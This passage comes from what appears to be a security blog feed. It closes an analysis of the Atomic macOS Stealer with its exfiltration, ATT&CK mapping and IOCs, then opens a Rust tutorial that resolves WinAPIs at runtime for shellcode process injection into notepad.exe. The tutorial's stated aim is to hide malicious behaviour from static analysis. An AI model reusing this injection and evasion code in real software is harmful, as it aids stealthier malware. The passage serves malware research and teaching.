and <strong>0x77</strong> is the hardcoded key.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img24.png" alt="Screenshot" /> <em><center>Figure 24 - XOR Operation</center></em></p> <p>The hardcoded key is not the same for all the strings, there are keys that are added to the counter (for example <strong>0x77</strong> in Figure 24) and keys that are subtracted from it. The strings are basically the same reported by <a href="https://gist.github.com/RussianPanda95/c74ac42f58983d08ca50cedac960065a">RussianPanda</a>, you can find mine <a href="https://gist.github.com/Syrion89/0253f808004bac873cad315ce6082f95">here</a></p> <h3 id="data-exfiltration">Data Exfiltration</h3> <p>The malware exfiltrates the stolen informations using a zip file that is filled everytime it reads informations (username, password, files), the malware uses the functions <strong>mz_zip_writer_finalize_archive</strong> and <strong>mz_zip_writer_end_internal</strong> to finalize the zip file.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img25.png" alt="Screenshot" /> <em><center>Figure 25 - Zip Finalize</center></em></p> <p>After that it executes the <strong>sentdata</strong> function to enstablish a connection to the C2 server and send a HTTP POST request containing the zip file.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img26.png" alt="Screenshot" /> <em><center>Figure 26 - HTTP Post Request to C2</center></em></p> <p>The HTTP request has the two following headers with hardcoded values:</p> <ul> <li>uuid: 42b7baec-e6da-483a-b26c-0e9cb2579abf</li> <li>user: october</li> </ul> <p>I dumped the zip file from the memory during an execution without any browser and wallet installed on the system, I found the following files related to the keychain, username, password and system information.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img27.png" alt="Screenshot" /> <em><center>Figure 27 - Zip Files</center></em></p> <p>As example the file user contains the following data.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img28.png" alt="Screenshot" /> <em><center>Figure 28 - File User Content</center></em></p> <h2 id="conclusion">Conclusion</h2> <p>The analysis of known malwares is still an interesting activity because every sample may have different behaviours.</p> <p>The use of <strong>Thread Local Variables</strong> to decrypt and use the strings is very interesting.</p> <p>The decrypting process described differs from the one reported in other blogs, moreover this sample requires only a minimum user interaction because the <strong>FileGrabber</strong> functiontality is disabled and the <strong>ChronosMasiter</strong> function is executed only if the user has a blank password.</p> <p>The generic names such as <strong>application_v1.1.dmg</strong>, <strong>AppleApp</strong>, and the presence of several functions that are not used can lead us to suppose that this is a test version.</p> <p>Feel free to contact me, I’d appreciate any feedback.</p> <h2 id="mitre-attck-matrix">MITRE ATT&amp;CK MATRIX</h2> <table> <thead> <tr> <th>TACTIC</th> <th>TECHNIQUE</th> <th>NAME</th> </tr> </thead> <tbody> <tr> <td>Reconnaissance</td> <td><a href="https://attack.mitre.org/techniques/T1592/001">T1592.001</a></td> <td>Gather Victim Host Information: Hardware</td> </tr> <tr> <td>Reconnaissance</td> <td><a href="https://attack.mitre.org/techniques/T1592/004">T1592.004</a></td> <td>Gather Victim Host Information: Client Configurations</td> </tr> <tr> <td>Reconnaissance</td> <td><a href="https://attack.mitre.org/techniques/T1589/001">T1589.001</a></td> <td>Gather Victim Identity Information: Credentials</td> </tr> <tr> <td>Resource Development</td> <td><a href="https://attack.mitre.org/techniques/T1583/008">T1583.008</a></td> <td>Acquire Infrastructure: Malvertising</td> </tr> <tr> <td>Initial Access</td> <td><a href="https://attack.mitre.org/tactics/TA0001">TA0001</a></td> <td>Initial Access</td> </tr> <tr> <td>Execution</td> <td><a href="https://attack.mitre.org/techniques/T1059/002">T1059.002</a></td> <td>Command and Scripting Interpreter: AppleScript</td> </tr> <tr> <td>Exeution</td> <td><a href="https://attack.mitre.org/techniques/T1059/004">T1059.004</a></td> <td>Command and Scripting Interpreter: Unix Shell</td> </tr> <tr> <td>Execution</td> <td><a href="https://attack.mitre.org/techniques/T1204/002">T1204.002</a></td> <td>User Execution: Malicious File</td> </tr> <tr> <td>Defense Evasion</td> <td><a href="https://attack.mitre.org/techniques/T1140">T1140</a></td> <td>Deobfuscate/Decode Files or Information</td> </tr> <tr> <td>Defense Evasion</td> <td><a href="https://attack.mitre.org/techniques/T1070/004/">T1070.004</a></td> <td>Indicator Removal: File Deletion</td> </tr> <tr> <td>Defense Evasion</td> <td><a href="https://attack.mitre.org/techniques/T1027/009">T1027.009</a></td> <td>Obfuscated Files or Information: Embedded Payloads</td> </tr> <tr> <td>Credential Access</td> <td><a href="https://attack.mitre.org/techniques/T1555/001">T1555.001</a></td> <td>Credentials from Password Stores: Keychain</td> </tr> <tr> <td>Credential Access</td> <td><a href="https://attack.mitre.org/techniques/T1555/003">T1555.003</a></td> <td>Credentials from Password Stores: Credentials from Web Browsers</td> </tr> <tr> <td>Credential Access</td> <td><a href="https://attack.mitre.org/techniques/T1539">T1539</a></td> <td>Steal Web Session Cookie</td> </tr> <tr> <td>Discovery</td> <td><a href="https://attack.mitre.org/techniques/T1087">T1087</a></td> <td>Account Discovery</td> </tr> <tr> <td>Discovery</td> <td><a href="https://attack.mitre.org/techniques/T1217">T1217</a></td> <td>Browser Information Discovery</td> </tr> <tr> <td>Discovery</td> <td><a href="https://attack.mitre.org/techniques/T1083">T1083</a></td> <td>File and Directory Discovery</td> </tr> <tr> <td>Discovery</td> <td><a href="https://attack.mitre.org/techniques/T1082">T1082</a></td> <td>System Information Discovery</td> </tr> <tr> <td>Collection</td> <td><a href="https://attack.mitre.org/techniques/T1560/002">T1560.002</a></td> <td>Archive Collected Data: Archive via Library</td> </tr> <tr> <td>Collection</td> <td><a href="https://attack.mitre.org/techniques/T1119/">T1119/</a></td> <td>Automated Collection</td> </tr> <tr> <td>Collection</td> <td><a href="https://attack.mitre.org/techniques/T1005">T1005</a></td> <td>Data from Local System</td> </tr> <tr> <td>Command and Control</td> <td><a href="https://attack.mitre.org/techniques/T1071/001">T1071.001/</a></td> <td>Application Layer Protocol: Web Protocols</td> </tr> <tr> <td>Exfiltration</td> <td><a href="https://attack.mitre.org/techniques/T1030">T1030</a></td> <td>Data Transfer Size Limits</td> </tr> <tr> <td>Exfiltration</td> <td><a href="https://attack.mitre.org/techniques/T1041">T1041</a></td> <td>Exfiltration Over C2 Channel</td> </tr> </tbody> </table> <h2 id="indicators-of-compromise">Indicators of Compromise</h2> <table> <thead> <tr> <th>CATEGORY</th> <th>TYPE</th> <th>VALUE</th> </tr> </thead> <tbody> <tr> <td>DMG</td> <td>SHA256</td> <td>08ff8a6500d623b062dcef8a2ef6fc141c1871f7a84b42f842d470fee26070c4</td> </tr> <tr> <td>Mach-O</td> <td>SHA256</td> <td>4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa</td> </tr> <tr> <td>Mach-O</td> <td>SHA256</td> <td>c802c94d0836039aa986e66200233bdf84a9f68512e7ba6d22e93ab679309d4a</td> </tr> <tr> <td>C2</td> <td>IP</td> <td>5.42.64[.]114</td> </tr> </tbody> </table> Fri, 08 Mar 2024 00:00:00 +0100 https://syrion.me/atomic-macos-stealer-amos-analysis/ https://syrion.me/atomic-macos-stealer-amos-analysis/ Malware macOS Rustware Part 3: Dynamic API resolution (Windows) <p>In the <a href="https://syrion.me/malware/rustware-part-2-process-enumeration-development/">previous blog post</a> we have seen how to perform a shellcode process injection by finding a target process PID using several WinAPIs, in that case all the WinAPIs were called directly. Usually malwares resolve the WinAPI address at runtime in order to hide malicious behaviours during static analysis.</p> <p>I have to thank <strong><a href="https://github.com/p1tsi">Jacopo</a></strong> for his feedbacks, he helped me to improve the code.</p> <p>In this blog post we will see how to use two well-known WinAPIs to dynamically resolve the WinAPIs Address: <strong>GetModuleHandle</strong> used to get a module address and <strong>GetProcessAddress</strong> used to get a WinAPI address.</p> <h2 id="runtime-api-resolution">Runtime API Resolution</h2> <p>The API resolution we are going to develop is very simple and relies on two WinAPIs:</p> <ul> <li><strong><a href="https://learn.microsoft.com/it-it/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea">GetModuleHandleA</a></strong>: retrieves a module handle of the specified module</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress">GetProcAddress</a></strong>: gets the address of a specified function in a DLL</li> </ul> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img1.png" alt="Screenshot" /> <em><center>Figure 1 - API Resolution</center></em></p> <h2 id="rustware-setup">Rustware Setup</h2> <p>Everything we need to develop a Rust program that leverages on WinAPI, is well described in the Microsoft “<a href="https://learn.microsoft.com/en-us/windows/dev-environment/rust/">Developing with Rust on Windows</a>”. In our case, we used the following software, plugins and crate:</p> <ul> <li>Visual Studio Code 1.83.0</li> <li>Rust-analyzer 0.3.1689</li> <li>CodeLLDB 1.10.0</li> <li>Crates 0.6.3</li> <li>Windows Crate 0.51.1</li> </ul> <h2 id="rustware-development">Rustware Development</h2> <p>First of all, it is necessary to add the Windows Crate and the features required by each WinAPI to the <strong>Cargo.toml</strong> file; we can see the features in the <a href="https://microsoft.github.io/windows-docs-rs/doc/windows/Win32/System/LibraryLoader/fn.GetModuleHandleA.html">Windows Crate documentation</a>.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img2.png" alt="Screenshot" /> <em><center>Figure 2 - GetModuleHandleA Specification</center></em></p> <p>The new two WinAPIs we are going to use require the following features:</p> <ul> <li><strong>GetModuleHandleA</strong>: “Win32_System_LibraryLoader” and “Win32_Foundation”</li> <li><strong>GetProcAddress</strong>: Win32_System_LibraryLoader” and “Win32_Foundation”</li> </ul> <p>After adding the Windows Crate and all the WinAPIs features, the <strong>Cargo.toml</strong> file will look like this.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img3.png" alt="Screenshot" /> <em><center>Figure 3 - Cargo.toml File</center></em></p> <p>Each feature must also be imported in the code; we can achieve this with the <strong>use</strong> declaration as shown in the code below.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::{</span> <span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::{</span><span class="n">size_of</span><span class="p">,</span> <span class="n">transmute</span><span class="p">},</span> <span class="nn">ptr</span><span class="p">::</span><span class="n">null_mut</span><span class="p">,</span> <span class="p">};</span> <span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="n">null</span><span class="p">;</span> <span class="k">use</span> <span class="nn">windows</span><span class="p">::{</span> <span class="nn">core</span><span class="p">::{</span><span class="n">Error</span><span class="p">,</span> <span class="n">HRESULT</span><span class="p">,</span> <span class="n">HSTRING</span><span class="p">,</span> <span class="n">PCSTR</span><span class="p">},</span> <span class="nn">Win32</span><span class="p">::{</span> <span class="nn">Foundation</span><span class="p">::</span><span class="n">BOOL</span><span class="p">,</span> <span class="nn">Foundation</span><span class="p">::</span><span class="n">HANDLE</span><span class="p">,</span> <span class="nn">Foundation</span><span class="p">::</span><span class="n">HMODULE</span><span class="p">,</span> <span class="nn">Security</span><span class="p">::</span><span class="n">SECURITY_ATTRIBUTES</span><span class="p">,</span> <span class="nn">System</span><span class="p">::{</span> <span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">ToolHelp</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">LibraryLoader</span><span class="p">::{</span><span class="n">GetModuleHandleA</span><span class="p">,</span> <span class="n">GetProcAddress</span><span class="p">},</span> <span class="nn">Memory</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Threading</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="p">},</span> <span class="p">},</span> <span class="p">};</span> </code></pre></div></div> <p>The <strong>resolve_api</strong> function takes two parameters, a <strong>HMODULE</strong> returned from <strong>GetModuleHandleA</strong> and the WinAPI name, it returns the function address or an error.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">resolve_api</span><span class="p">(</span> <span class="n">module_handle</span><span class="p">:</span> <span class="n">HMODULE</span><span class="p">,</span> <span class="n">api_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">isize</span><span class="p">,</span> <span class="n">Error</span><span class="o">&gt;</span> </code></pre></div></div> <p>Since <strong>GetProcAddress</strong> is an <strong>unsafe</strong> function, we must use it in an <strong>unsafe</strong> block. In the following code we can see that the <strong>GetProcAddress</strong> takes the <strong>HMODULE</strong> and a <strong>PCSTR</strong> string (rappresenting the WinAPI name) as arguments and returns the WinAPI address or an error.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">resolve_api</span><span class="p">(</span> <span class="n">module_handle</span><span class="p">:</span> <span class="n">HMODULE</span><span class="p">,</span> <span class="n">api_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">isize</span><span class="p">,</span> <span class="n">Error</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">match</span> <span class="nf">GetProcAddress</span><span class="p">(</span><span class="n">module_handle</span><span class="p">,</span> <span class="nn">PCSTR</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="n">api_name</span><span class="nf">.as_ptr</span><span class="p">()))</span> <span class="p">{</span> <span class="nf">Some</span><span class="p">(</span><span class="n">winapi_addr</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">winapi_addr</span><span class="p">);</span> <span class="p">}</span> <span class="nb">None</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"GetProcAddress Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>In order to use the return value from the <strong>resolve_api</strong> function, we need to define the WinAPI function pointer for all the WinAPIs we are going to use in the shellcode process injection; We can do it in Rust with the <strong><a href="https://doc.rust-lang.org/std/keyword.type.html">type</a></strong> keyword. Each WinAPI is defined as an <strong>unsafe <a href="https://doc.rust-lang.org/beta/reference/items/external-blocks.html">extern</a> “system”</strong> function.</p> <p>For the <strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a></strong>, we can define a type <strong>OpenProcessAPI</strong> that is an <strong>unsafe extern “system”</strong> fuction, based on the Microsoft Documentation, it gets three parameters: a <strong>PROCESS_ACCESS_RIGHTS</strong>, a <strong>bool</strong> and a 32-bit unsigned integer, and return a <strong>HANDLE</strong>.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">type</span> <span class="n">OpenProcessFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">PROCESS_ACCESS_RIGHTS</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> </code></pre></div></div> <p>We can define the <strong>type</strong> for all the WinAPIs as shown in the code below.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">type</span> <span class="n">CreateToolhelp32SnapshotApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">CREATE_TOOLHELP_SNAPSHOT_FLAGS</span><span class="p">,</span> <span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> <span class="k">type</span> <span class="n">Process32FirstApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PROCESSENTRY32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">Process32NextApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PROCESSENTRY32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">OpenProcessApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">PROCESS_ACCESS_RIGHTS</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> <span class="k">type</span> <span class="n">CloseHandleApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">VirtualAlloExApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">VIRTUAL_ALLOCATION_TYPE</span><span class="p">,</span> <span class="n">PAGE_PROTECTION_FLAGS</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">;</span> <span class="k">type</span> <span class="n">WriteProcessMemoryApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">VirtualProtectExApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">PAGE_PROTECTION_FLAGS</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PAGE_PROTECTION_FLAGS</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">CreateRemoteThreadApi</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="n">SECURITY_ATTRIBUTES</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">LPTHREAD_START_ROUTINE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nb">u32</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u32</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> </code></pre></div></div> <p>I changed the <strong>get_pid</strong> and the <strong>inject</strong> functions in order to return a <strong>Result</strong>, because of this I used the <strong>?</strong> operator in the expression that returns a <strong>Result</strong> (as <strong>GetModuleHandleA</strong> and <strong>transmute</strong>), in this way we can handle all the errors in the <strong>main</strong> function.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">u32</span><span class="p">,</span> <span class="n">Error</span><span class="o">&gt;</span> <span class="k">fn</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="n">Error</span><span class="o">&gt;</span> </code></pre></div></div> <p>The <strong>main</strong> function was changed too, you can see the full code at the end of the blog post.</p> <p>At this point we can get the kernel32 handle with <strong>GetModuleHandleA</strong>, if everything is ok the <strong>kernel32_module_handle</strong> variable will have the module address otherwise the <strong>main</strong> function will handle the error.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">kernel32_module_handle</span><span class="p">:</span> <span class="n">HMODULE</span> <span class="o">=</span> <span class="nf">GetModuleHandleA</span><span class="p">(</span><span class="nn">PCSTR</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="s">"kernel32.dll</span><span class="se">\0</span><span class="s">"</span><span class="nf">.as_ptr</span><span class="p">()))</span><span class="o">?</span><span class="p">;</span> </code></pre></div></div> <p>For each WinAPI, we must create a variable of the <strong>type</strong> we defined before and <strong>transmute</strong> the address returned by our <strong>resolve_api</strong> function.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">create_toolhelp32_snapshot</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CreateToolhelp32Snapshot</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">process32_first</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"Process32First</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">process32_next</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"Process32Next</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">close_handle</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CloseHandle</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="k">let</span> <span class="n">open_process</span><span class="p">:</span> <span class="n">OpenProcessFunc</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"OpenProcess</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">virtual_alloc_ex</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"VirtualAllocEx</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">write_process_memory</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"WriteProcessMemory</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">virtual_protect_ex</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"VirtualProtectEx</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">create_remote_thread</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CreateRemoteThread</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> </code></pre></div></div> <p>At this point, we can call the WinAPIs, for example we can execute <strong>OpenProcess</strong> as shown below.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">handle_process</span><span class="p">:</span> <span class="n">HANDLE</span> <span class="o">=</span> <span class="nf">open_process</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span> <span class="k">false</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> </code></pre></div></div> <p>Using the <strong>target</strong> flag, we can specify the i686 architecture and compile the program into a 32bit binary.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img4.png" alt="Screenshot" /> <em><center>Figure 4 - Compile Program for 32bit architecture</center></em></p> <p>Running it, it successfully resolves the WinAPI, finds the notepad.exe PID and injects our MessageBox into it.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img5.png" alt="Screenshot" /> <em><center>Figure 5 - MessageBox Process Injection in Notepad.exe</center></em></p> <h2 id="debugging">Debugging</h2> <p>Using Process Hacker and x32dbg we can debug our binary to understand how it works under the hood. We set the breakpoints on the <strong>GetModuleHandleA</strong> and <strong>GetProcAddress</strong> WinAPI.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img6.png" alt="Screenshot" /> <em><center>Figure 6 - x32dbg Breakpoints</center></em></p> <h3 id="getmodulehandlea">GetModuleHandleA</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GetModuleHandleA</span><span class="p">(</span><span class="nn">PCSTR</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="s">"kernel32.dll</span><span class="se">\0</span><span class="s">"</span><span class="nf">.as_ptr</span><span class="p">()))</span><span class="o">?</span><span class="p">;</span> </code></pre></div></div> <p>Running the debugger, we step on the <strong>GetModuleHandleA</strong>, we can see that it gets one parameter, the “kernel32.dll” string address.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img7.png" alt="Screenshot" /> <em><center>Figure 7 - GetModuleHandleA Debug</center></em></p> <p><strong>GetModuleHandleA</strong> returns the value <strong>0x76740000</strong>, so we can confirm it is the <strong>kernel32.dll</strong> module address by looking at its address using ProcessHacker.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img8.png" alt="Screenshot" /> <em><center>Figure 8 - Rustware Modules</center></em></p> <h3 id="getprocaddress">GetProcAddress</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span><span class="s">"CreateToolhelp32Snapshot</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span> </code></pre></div></div> <p>Taking the <strong>CreateToolhelp32Snapshot</strong> as example, we can see the two parameters for GetProcAddress:</p> <ul> <li><strong>0x76740000</strong> is the <strong>kernel32.dll</strong> module address</li> <li><strong>0x98F378</strong> is the “CreateTool32helpSnapshot” string address.</li> </ul> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img9.png" alt="Screenshot" /> <em><center>Figure 9 - GetProcAddress CreateToolhelp32Snapshot Debug</center></em></p> <p>The same happens for the remaining WinAPIs as shown in the following images.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img10.png" alt="Screenshot" /> <em><center>Figure 10 - GetProcAddress Process32First Debug</center></em></p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img11.png" alt="Screenshot" /> <em><center>Figure 11 - GetProcAddress Process32Next Debug</center></em></p> <p><img 